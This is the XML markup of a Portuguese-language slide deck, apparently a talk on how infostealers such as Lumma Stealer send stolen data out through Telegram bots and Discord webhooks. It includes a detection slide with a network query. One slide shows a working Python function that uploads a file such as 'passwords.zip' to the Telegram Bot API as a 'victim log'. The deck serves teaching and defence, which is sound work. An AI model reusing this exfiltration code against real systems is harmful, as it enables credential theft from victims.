                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD215A11-542B-520B-F309-5CB15353E8AE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5615665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E7790A-5722-593B-0226-D0FBFA394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E8641AB3-EC1D-497A-79D2-A62B3B150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FF522E6-CBC9-39E8-157A-1AD936D72996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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A CADEIA DE ATAQUE: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6CBE5E1-94B1-6D11-7B5D-DB0FF16C4C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19052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10C390D-046D-169F-771A-DF46A9409784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7089049" y="13069669"/>
            <a:ext cx="10208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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cadeia de ataque do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lumma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="36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BR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Fonte: Microsoft</a:t>
            </a:r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68B3269E-7591-2DD3-714B-6B7DB327B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984" y="3143130"/>
            <a:ext cx="14545080" cy="9896852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C3467ED7-844D-5C48-9283-F6E3E119D5DB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8787093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6F3BED-A45F-5B79-2DEC-742D2207F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C2194481-4207-56E6-C581-1D1A9F1F9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74FF576-AA56-8859-5E98-BAEDF31672F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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EXFILTRAÇÃO VIA TELEGRAM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26194A9-E004-0AF6-8F40-D9F949C59A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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96F4DA6D-6A40-7852-8FEF-5D9B5FBA852B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- POR QUE O TELEGRAM?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- TELEGRAM BOT API (BOT TOKEN + CHAT ID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- ANTES DE ENVIAR, O MALWARE VASCULHA PASTAS ESPECÍFICAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- OS DADOS SÃO COMPACTADOS EM UM ARQUIVO .ZIP OU .7Z NA PASTA %TEMP%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- PARA ARQUIVOS GRANDES (LOGS DE SENHAS, COOKIES), O MALWARE UTILIZA O ENDPOINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SENDDOCUMENT. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- SE FOR APENAS UMA NOTIFICAÇÃO DE "NOVO SISTEMA INFECTADO", UTILIZA-SE O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SENDMESSAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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3703FC48-72AC-0136-5FFA-50EB1FCD7372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1237870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800861-B5F6-5EEB-36EE-D47BD9336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34F07D7C-D3E7-0232-9256-CB75A8D96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85694A7-9AB0-3D6A-E787-D6C779E923E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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EXFILTRAÇÃO VIA TELEGRAM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CE76C20-7024-F1B2-5B8E-3C1F73073FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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B11C2B-CF4B-92BE-1CD2-3C9994ACDDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905237" y="3995762"/>
            <a:ext cx="21160035" cy="87100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t-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exfiltrate_to_telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bot_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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f"https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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://api.telegram.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bot_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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lang="pt-BR" sz="4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sendDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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chat_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chat_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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caption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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"Novo Log de Vítima"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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     files = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: file}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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 O malware faz um POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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para os servidores do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Telegram</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        response = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, files=files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response.status_code</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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 Exemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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exfiltrate_to_telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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('passwords.zip', '123456:ABC...', '987654321')</a:t>
            </a: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DFE6D31B-19A8-4E54-FC79-813595AE2899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2096446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3690F1-7903-7F18-1B68-2FF2C566E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CF829547-AD6E-AFA2-7C5F-EA8000DFF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D0A07EE-CA83-414F-9902-2954B2C2143A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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EXFILTRAÇÃO VIA TELEGRAM - DETECÇÃO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118DC33-F2FD-0111-4DD9-9731EC05DC65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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E2861835-D175-1801-04E0-08356B58B78C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057638" y="4086030"/>
            <a:ext cx="10135950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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MONITORAMENTO DE REDE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ANÁLISE DE ENDPOINT (EDR/XDR)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INTELIGÊNCIA DE AMEAÇAS (TOKENS DE BOTS)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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSPEÇÃO DE CERTIFICADOS (SSL/TLS DECRYPTION)</a:t>
            </a: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804DDE1-2AD9-1E20-889D-3A90C1AFFB96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12607347" y="4362061"/>
            <a:ext cx="10854509" cy="50167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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destination_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network_events</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destination_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONTAINS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "api.telegram.org" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("C:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Desktop\Telegram.exe", "C:\Windows\System32\curl.exe")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> != "Admin";</a:t>
            </a:r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0BD64879-8E0D-794E-F339-BEAA9DDA139E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2869258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4CFD09-B369-3EFF-BB41-E09465740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B23FCD7C-CC6B-47B3-FCB2-7C53ECEF3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3065350-7877-7AFD-BACA-0382E32F393F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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EXFILTRAÇÃO VIA DISCORD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7CE363F-8548-0158-2FA6-F87587457FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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71AF4317-11B8-2ECF-4694-5E889945A813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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POR QUE O DISCORD?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WEBHOOKS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DISCORD CDN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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENQUANTO NO TELEGRAM VOCÊ INTERAGE COM UM BOT, NO DISCORD O ATACANTE CRIA UM CANAL PRIVADO E GERA UMA URL DE WEBHOOK. QUALQUER DADO ENVIADO PARA ESSA URL (VIA POST REQUEST) APARECE INSTANTANEAMENTE COMO UMA MENSAGEM NO CANAL.</a:t>
            </a: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5DCC8925-9532-70D3-6A03-311BC9AF11BA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0510299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CD324F-101E-A83D-2C19-6EA5D2DC4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DEA6F502-9000-10E7-D0B1-99F541045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315824B-A156-F6FE-9AD8-1CF8D90F1FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
